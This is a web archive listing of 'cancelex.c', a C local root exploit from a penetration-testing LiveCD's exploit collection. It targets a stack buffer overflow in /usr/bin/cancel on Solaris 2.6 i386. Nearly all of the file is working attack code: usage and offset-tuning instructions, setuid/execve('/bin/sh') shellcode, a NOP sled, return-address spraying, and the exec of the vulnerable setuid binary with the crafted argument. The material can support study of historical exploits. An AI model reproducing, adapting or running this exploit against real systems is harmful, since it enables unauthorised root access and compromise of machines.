home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / cancelex.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  4KB  |  117 lines

  1. /**
  2. ***  cancelex - i386 Solaris root exploit for /usr/bin/cancel
  3. ***
  4. ***  Tested and confirmed under Solaris 2.6 (i386)
  5. ***
  6. ***  Usage:  % cancelex hostname [offset]
  7. ***
  8. ***  where hostname is the name of a host running the printer service on
  9. ***  TCP port 515 (such as "localhost" perhaps) and offset (if present)
  10. ***  is the number of bytes to add to the stack pointer to calculate your
  11. ***  target return address; try -1000 to 1000 in increments of 100 for
  12. ***  starters.
  13. ***
  14. ***  Cheez Whiz
  15. ***  cheezbeast@hotmail.com
  16. ***
  17. ***  February 25, 1999
  18. **/
  19.  
  20. #include <stdio.h>
  21. #include <stdlib.h>
  22. #include <string.h>
  23. #include <unistd.h>
  24.  
  25. #define BUFLEN 1031
  26. #define NOP 0x90
  27.  
  28. char shell[] =
  29.   /*  0 */ "\xeb\x3b"                         /* jmp springboard [2000]*/
  30.   /* syscall:                                                    [2000]*/
  31.   /*  2 */ "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0   [2000]*/
  32.   /*  9 */ "\xc3"                             /* ret             [2000]*/
  33.   /* start:                                                      [2000]*/
  34.   /* 10 */ "\x5e"                             /* popl %esi       [2000]*/
  35.   /* 11 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  36.   /* 13 */ "\x89\x46\xc1"                     /* movl %eax,-0x3f(%esi) */
  37.   /* 16 */ "\x88\x46\xc6"                     /* movb %al,-0x3a(%esi)  */
  38.   /* 19 */ "\x88\x46\x07"                     /* movb %al,0x7(%esi)    */
  39.   /* 22 */ "\x89\x46\x0c"                     /* movl %eax,0xc(%esi)   */
  40.   /* setuid:                                                     [2000]*/
  41.   /* 25 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  42.   /* 27 */ "\x50"                             /* pushl %eax      [2000]*/
  43.   /* 28 */ "\xb0\x17"                         /* movb $0x17,%al  [2000]*/
  44.   /* 30 */ "\xe8\xdf\xff\xff\xff"             /* call syscall    [2000]*/
  45.   /* 35 */ "\x83\xc4\x04"                     /* addl $0x4,%esp  [2000]*/
  46.   /* execve:                                                     [2000]*/
  47.   /* 38 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  48.   /* 40 */ "\x50"                             /* pushl %eax      [2000]*/
  49.   /* 41 */ "\x8d\x5e\x08"                     /* leal 0x8(%esi),%ebx   */
  50.   /* 44 */ "\x53"                             /* pushl %ebx      [2000]*/
  51.   /* 45 */ "\x8d\x1e"                         /* leal (%esi),%ebx[2000]*/
  52.   /* 47 */ "\x89\x5e\x08"                     /* movl %ebx,0x8(%esi)   */
  53.   /* 50 */ "\x53"                             /* pushl %ebx      [2000]*/
  54.   /* 51 */ "\xb0\x3b"                         /* movb $0x3b,%al  [2000]*/
  55.   /* 53 */ "\xe8\xc8\xff\xff\xff"             /* call syscall    [2000]*/
  56.   /* 58 */ "\x83\xc4\x0c"                     /* addl $0xc,%esp  [2000]*/
  57.   /* springboard:                                                [2000]*/
  58.   /* 61 */ "\xe8\xc8\xff\xff\xff"             /* call start      [2000]*/
  59.   /* data:                                                       [2000]*/
  60.   /* 66 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA            [2000]*/
  61.   /* 74 */ "\xff\xff\xff\xff"                 /* DATA            [2000]*/
  62.   /* 78 */ "\xff\xff\xff\xff";                /* DATA            [2000]*/
  63.  
  64. char buf[BUFLEN+1];
  65. char *egg;
  66. unsigned long int esp, nop;
  67. long int offset = 0;
  68.  
  69. unsigned long int
  70. get_esp()
  71. {
  72.   __asm__("movl %esp,%eax");
  73. }
  74.  
  75. void
  76. main(int argc, char *argv[])
  77. {
  78.   int i;
  79.  
  80.   if (argc < 2)
  81.     {
  82.       printf("usage: %s hostname [offset]\n", argv[0]);
  83.       return;
  84.     }
  85.  
  86.   esp = get_esp();
  87.  
  88.   if (argc > 2)
  89.     offset = strtol(argv[2], NULL, 0);
  90.  
  91.   if (argc > 3)
  92.     nop = strtoul(argv[3], NULL, 0);
  93.   else
  94.     nop = 933;
  95.  
  96.   memset(buf, NOP, BUFLEN);
  97.   memcpy(buf+nop, shell, strlen(shell));
  98.   for (i = nop+strlen(shell); i <= BUFLEN-4; i += 4)
  99.     *((int *) &buf[i]) = esp+offset;
  100.  
  101.   if ((egg = (char *) malloc(strlen(argv[1])+1+BUFLEN+1)) == NULL)
  102.     {
  103.       printf("malloc failed!\n");
  104.       return;
  105.     }
  106.   snprintf(egg, strlen(argv[1])+1+BUFLEN+1, "%s:%s", argv[1], buf);
  107.  
  108.   printf("jumping to 0x%08x (0x%08x offset %d) [nop %d]\n",
  109.          esp+offset, esp, offset, nop);
  110.   execl("/usr/bin/cancel", "cancel", egg, NULL);
  111.   /* execl("/usr/ucb/lprm", "lprm", "-P", egg, NULL); */
  112.  
  113.   printf("exec failed!\n");
  114.   return;
  115. }
  116.  
  117. /*                    www.hack.co.za              [2000]*/